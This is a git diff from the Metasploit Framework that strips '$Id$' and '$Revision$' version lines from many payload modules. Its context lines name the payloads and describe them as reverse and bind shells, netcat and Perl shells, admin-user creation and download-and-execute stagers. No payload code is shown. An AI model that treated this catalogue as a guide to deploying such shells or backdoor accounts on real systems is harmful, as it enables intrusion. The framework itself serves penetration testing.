-## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSD Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb b/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb index 1bb8509ac9..58541dd844 100644 --- a/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb +++ b/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSD Command Shell, Bind TCP Inline (IPv6)', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell over IPv6', 'Author' => ['skape', 'vlad902', 'hdm'], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/bsd/x86/shell_find_port.rb b/modules/payloads/singles/bsd/x86/shell_find_port.rb index b82685cbea..56c8f83983 100644 --- a/modules/payloads/singles/bsd/x86/shell_find_port.rb +++ b/modules/payloads/singles/bsd/x86/shell_find_port.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSD Command Shell, Find Port Inline', - 'Version' => '$Revision$', 'Description' => 'Spawn a shell on an established connection', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/bsd/x86/shell_find_tag.rb b/modules/payloads/singles/bsd/x86/shell_find_tag.rb index 344518b3ef..1f39047450 100644 --- a/modules/payloads/singles/bsd/x86/shell_find_tag.rb +++ b/modules/payloads/singles/bsd/x86/shell_find_tag.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSD Command Shell, Find Tag Inline', - 'Version' => '$Revision$', 'Description' => 'Spawn a shell on an established connection (proxy/nat safe)', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb b/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb index 766bfb6307..81b283ce99 100644 --- a/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSD Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb index 8d3f86dea1..a17bd86663 100644 --- a/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb +++ b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSD Command Shell, Reverse TCP Inline (IPv6)', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell over IPv6', 'Author' => [ 'skape', 'vlad902', 'hdm' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb b/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb index 120111bd5d..c72aff9211 100644 --- a/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSDi Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => [ 'skape', 'optyx' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/bsdi/x86/shell_find_port.rb b/modules/payloads/singles/bsdi/x86/shell_find_port.rb index 2b9bf789a3..de0b83a149 100644 --- a/modules/payloads/singles/bsdi/x86/shell_find_port.rb +++ b/modules/payloads/singles/bsdi/x86/shell_find_port.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSDi Command Shell, Find Port Inline', - 'Version' => '$Revision$', 'Description' => 'Spawn a shell on an established connection', 'Author' => [ 'skape', 'optyx' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb b/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb index e2e980d390..903fde9e49 100644 --- a/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'BSDi Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => [ 'skape', 'optyx' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/bind_inetd.rb b/modules/payloads/singles/cmd/unix/bind_inetd.rb index df12ca9e03..e8810c84b4 100644 --- a/modules/payloads/singles/cmd/unix/bind_inetd.rb +++ b/modules/payloads/singles/cmd/unix/bind_inetd.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Bind TCP (inetd)', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell (persistent)', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/bind_netcat.rb b/modules/payloads/singles/cmd/unix/bind_netcat.rb index aea5392a12..cb4d8dbc38 100644 --- a/modules/payloads/singles/cmd/unix/bind_netcat.rb +++ b/modules/payloads/singles/cmd/unix/bind_netcat.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Bind TCP (via netcat -e)', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell via netcat', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/bind_netcat_ipv6.rb b/modules/payloads/singles/cmd/unix/bind_netcat_ipv6.rb index 8a5c400356..f5c4d05675 100644 --- a/modules/payloads/singles/cmd/unix/bind_netcat_ipv6.rb +++ b/modules/payloads/singles/cmd/unix/bind_netcat_ipv6.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Bind TCP (via netcat -e) IPv6', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell via netcat', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/bind_perl.rb b/modules/payloads/singles/cmd/unix/bind_perl.rb index 9c2af17181..f0361c6406 100644 --- a/modules/payloads/singles/cmd/unix/bind_perl.rb +++ b/modules/payloads/singles/cmd/unix/bind_perl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Bind TCP (via Perl)', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell via perl', 'Author' => ['Samy ', 'cazz'], 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb b/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb index 42dc2deb78..6ec83ad666 100644 --- a/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb +++ b/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Bind TCP (via perl) IPv6', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell via perl', 'Author' => ['Samy ', 'cazz'], 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/bind_ruby.rb b/modules/payloads/singles/cmd/unix/bind_ruby.rb index b65f70cf78..ba3f797be6 100644 --- a/modules/payloads/singles/cmd/unix/bind_ruby.rb +++ b/modules/payloads/singles/cmd/unix/bind_ruby.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Bind TCP (via Ruby)', - 'Version' => '$Revision$', 'Description' => 'Continually listen for a connection and spawn a command shell via Ruby', 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb b/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb index 9d61294626..a6c85ad106 100644 --- a/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb +++ b/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Bind TCP (via Ruby) IPv6', - 'Version' => '$Revision$', 'Description' => 'Continually listen for a connection and spawn a command shell via Ruby', 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/generic.rb b/modules/payloads/singles/cmd/unix/generic.rb index e5ecff7522..a220a01a9f 100644 --- a/modules/payloads/singles/cmd/unix/generic.rb +++ b/modules/payloads/singles/cmd/unix/generic.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command, Generic Command Execution', - 'Version' => '$Revision$', 'Description' => 'Executes the supplied command', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/interact.rb b/modules/payloads/singles/cmd/unix/interact.rb index b4ff6a881b..c031b2f2cd 100644 --- a/modules/payloads/singles/cmd/unix/interact.rb +++ b/modules/payloads/singles/cmd/unix/interact.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command, Interact with Established Connection', - 'Version' => '$Revision$', 'Description' => 'Interacts with a shell on an established socket connection', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/reverse.rb b/modules/payloads/singles/cmd/unix/reverse.rb index 17a8cfa886..424680677b 100644 --- a/modules/payloads/singles/cmd/unix/reverse.rb +++ b/modules/payloads/singles/cmd/unix/reverse.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Double reverse TCP (telnet)', - 'Version' => '$Revision$', 'Description' => 'Creates an interactive shell through two inbound connections', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/reverse_bash.rb b/modules/payloads/singles/cmd/unix/reverse_bash.rb index 865b496316..c34894c110 100644 --- a/modules/payloads/singles/cmd/unix/reverse_bash.rb +++ b/modules/payloads/singles/cmd/unix/reverse_bash.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Reverse TCP (/dev/tcp)', - 'Version' => '$Revision$', 'Description' => %q{ Creates an interactive shell via bash's builtin /dev/tcp. This will not work on most Debian-based Linux distributions diff --git a/modules/payloads/singles/cmd/unix/reverse_netcat.rb b/modules/payloads/singles/cmd/unix/reverse_netcat.rb index 5afee8c058..fd84a11d48 100644 --- a/modules/payloads/singles/cmd/unix/reverse_netcat.rb +++ b/modules/payloads/singles/cmd/unix/reverse_netcat.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Reverse TCP (via netcat -e)', - 'Version' => '$Revision$', 'Description' => 'Creates an interactive shell via netcat', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/reverse_perl.rb b/modules/payloads/singles/cmd/unix/reverse_perl.rb index 56c81e5482..4e39a0a0a6 100644 --- a/modules/payloads/singles/cmd/unix/reverse_perl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_perl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Reverse TCP (via Perl)', - 'Version' => '$Revision$', 'Description' => 'Creates an interactive shell via perl', 'Author' => 'cazz', 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/cmd/unix/reverse_ruby.rb b/modules/payloads/singles/cmd/unix/reverse_ruby.rb index 41b2524aec..d6f75cec7e 100644 --- a/modules/payloads/singles/cmd/unix/reverse_ruby.rb +++ b/modules/payloads/singles/cmd/unix/reverse_ruby.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Reverse TCP (via Ruby)', - 'Version' => '$Revision$', 'Description' => 'Connect back and create a command shell via Ruby', 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/cmd/windows/adduser.rb b/modules/payloads/singles/cmd/windows/adduser.rb index fd2698b7a5..2af7ce073f 100644 --- a/modules/payloads/singles/cmd/windows/adduser.rb +++ b/modules/payloads/singles/cmd/windows/adduser.rb @@ -1,5 +1,3 @@ -# $Id$ - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Execute net user /ADD CMD', - 'Version' => '$Revision$', 'Description' => %q{ Create a new user and add them to local administration group. diff --git a/modules/payloads/singles/cmd/windows/bind_perl.rb b/modules/payloads/singles/cmd/windows/bind_perl.rb index e4009a30a1..8a30eda1d6 100644 --- a/modules/payloads/singles/cmd/windows/bind_perl.rb +++ b/modules/payloads/singles/cmd/windows/bind_perl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Command Shell, Bind TCP (via Perl)', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell via perl (persistent)', 'Author' => ['Samy ', 'cazz', 'patrick'], 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb b/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb index 9ab31a28f5..b45a80c79f 100644 --- a/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb +++ b/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Command Shell, Bind TCP (via perl) IPv6', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell via perl (persistent)', 'Author' => ['Samy ', 'cazz', 'patrick'], 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/cmd/windows/bind_ruby.rb b/modules/payloads/singles/cmd/windows/bind_ruby.rb index 51a33adbab..40938e1770 100644 --- a/modules/payloads/singles/cmd/windows/bind_ruby.rb +++ b/modules/payloads/singles/cmd/windows/bind_ruby.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Command Shell, Bind TCP (via Ruby)', - 'Version' => '$Revision$', 'Description' => 'Continually listen for a connection and spawn a command shell via Ruby', 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/cmd/windows/download_eval_vbs.rb b/modules/payloads/singles/cmd/windows/download_eval_vbs.rb index 27d525a5b5..1fbb3e6b21 100644 --- a/modules/payloads/singles/cmd/windows/download_eval_vbs.rb +++ b/modules/payloads/singles/cmd/windows/download_eval_vbs.rb @@ -1,5 +1,3 @@ -# $Id$ - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Executable Download and Evaluate VBS', - 'Version' => '$Revision$', 'Description' => 'Downloads a file from an HTTP(S) URL and executes it as a vbs script. Use it to stage a vbs encoded payload from a short command line. ', 'Author' => 'scriptjunkie', diff --git a/modules/payloads/singles/cmd/windows/download_exec_vbs.rb b/modules/payloads/singles/cmd/windows/download_exec_vbs.rb index 4e82323710..57c179bfca 100644 --- a/modules/payloads/singles/cmd/windows/download_exec_vbs.rb +++ b/modules/payloads/singles/cmd/windows/download_exec_vbs.rb @@ -1,5 +1,3 @@ -# $Id$ - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Executable Download and Execute (via .vbs)', - 'Version' => '$Revision$', 'Description' => 'Download an EXE from an HTTP(S) URL and execute it', 'Author' => 'scriptjunkie', 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/cmd/windows/reverse_perl.rb b/modules/payloads/singles/cmd/windows/reverse_perl.rb index b1f367e93d..37bb01b97d 100644 --- a/modules/payloads/singles/cmd/windows/reverse_perl.rb +++ b/modules/payloads/singles/cmd/windows/reverse_perl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Command, Double reverse TCP connection (via Perl)', - 'Version' => '$Revision$', 'Description' => 'Creates an interactive shell via perl', 'Author' => ['cazz', 'patrick'], 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/cmd/windows/reverse_ruby.rb b/modules/payloads/singles/cmd/windows/reverse_ruby.rb index 1ad6f6fcf2..5f623a9f28 100644 --- a/modules/payloads/singles/cmd/windows/reverse_ruby.rb +++ b/modules/payloads/singles/cmd/windows/reverse_ruby.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Command Shell, Reverse TCP (via Ruby)', - 'Version' => '$Revision$', 'Description' => 'Connect back and create a command shell via Ruby', 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/generic/custom.rb b/modules/payloads/singles/generic/custom.rb index c91f585520..68c0da9d21 100644 --- a/modules/payloads/singles/generic/custom.rb +++ b/modules/payloads/singles/generic/custom.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Custom Payload', - 'Version' => '$Revision$', 'Description' => 'Use custom string or file as payload. Set either PAYLOADFILE or PAYLOADSTR.', 'Author' => 'scriptjunkie ', diff --git a/modules/payloads/singles/generic/debug_trap.rb b/modules/payloads/singles/generic/debug_trap.rb index 2deb0398a9..ad12644bd4 100644 --- a/modules/payloads/singles/generic/debug_trap.rb +++ b/modules/payloads/singles/generic/debug_trap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Generic x86 Debug Trap', - 'Version' => '$Revision$', 'Description' => 'Generate a debug trap in the target process', 'Author' => 'robert ', 'Platform' => [ 'win', 'linux', 'bsd', 'solaris', 'bsdi', 'osx' ], diff --git a/modules/payloads/singles/generic/shell_bind_tcp.rb b/modules/payloads/singles/generic/shell_bind_tcp.rb index a295527af3..e175e8740b 100644 --- a/modules/payloads/singles/generic/shell_bind_tcp.rb +++ b/modules/payloads/singles/generic/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Generic Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/generic/shell_reverse_tcp.rb b/modules/payloads/singles/generic/shell_reverse_tcp.rb index 0d1dd741d9..90bb47a350 100644 --- a/modules/payloads/singles/generic/shell_reverse_tcp.rb +++ b/modules/payloads/singles/generic/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Generic Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/generic/tight_loop.rb b/modules/payloads/singles/generic/tight_loop.rb index 47ac326c88..de6146b2e9 100644 --- a/modules/payloads/singles/generic/tight_loop.rb +++ b/modules/payloads/singles/generic/tight_loop.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Generic x86 Tight Loop', - 'Version' => '$Revision$', 'Description' => 'Generate a tight loop in the target process', 'Author' => 'jduck', 'Platform' => [ 'win', 'linux', 'bsd', 'solaris', 'bsdi', 'osx' ], diff --git a/modules/payloads/singles/java/jsp_shell_bind_tcp.rb b/modules/payloads/singles/java/jsp_shell_bind_tcp.rb index 2794f03259..0f38f7a307 100644 --- a/modules/payloads/singles/java/jsp_shell_bind_tcp.rb +++ b/modules/payloads/singles/java/jsp_shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file in part of the Metasploit Framework and may be subject to # redintribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Java JSP Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => [ 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb index f3b8137b9a..4ff0253704 100644 --- a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb +++ b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file in part of the Metasploit Framework and may be subject to # redintribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Java JSP Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => [ 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/java/shell_reverse_tcp.rb b/modules/payloads/singles/java/shell_reverse_tcp.rb index 82b6889ea0..c8cf54c89c 100644 --- a/modules/payloads/singles/java/shell_reverse_tcp.rb +++ b/modules/payloads/singles/java/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Java Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => [ 'mihi', # all the hard work diff --git a/modules/payloads/singles/linux/armle/adduser.rb b/modules/payloads/singles/linux/armle/adduser.rb index d647e1aae7..8d9de67d96 100644 --- a/modules/payloads/singles/linux/armle/adduser.rb +++ b/modules/payloads/singles/linux/armle/adduser.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Add User', - 'Version' => '$Revision$', 'Description' => 'Create a new user with UID 0', 'Author' => [ 'Jonathan Salwan' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/armle/exec.rb b/modules/payloads/singles/linux/armle/exec.rb index 44f9bd3c8c..8eb7c19354 100644 --- a/modules/payloads/singles/linux/armle/exec.rb +++ b/modules/payloads/singles/linux/armle/exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Execute Command', - 'Version' => '$Revision$', 'Description' => 'Execute an arbitrary command', 'Author' => 'Jonathan Salwan', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb b/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb index 0841e716d8..b696fe9717 100644 --- a/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'civ', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb index 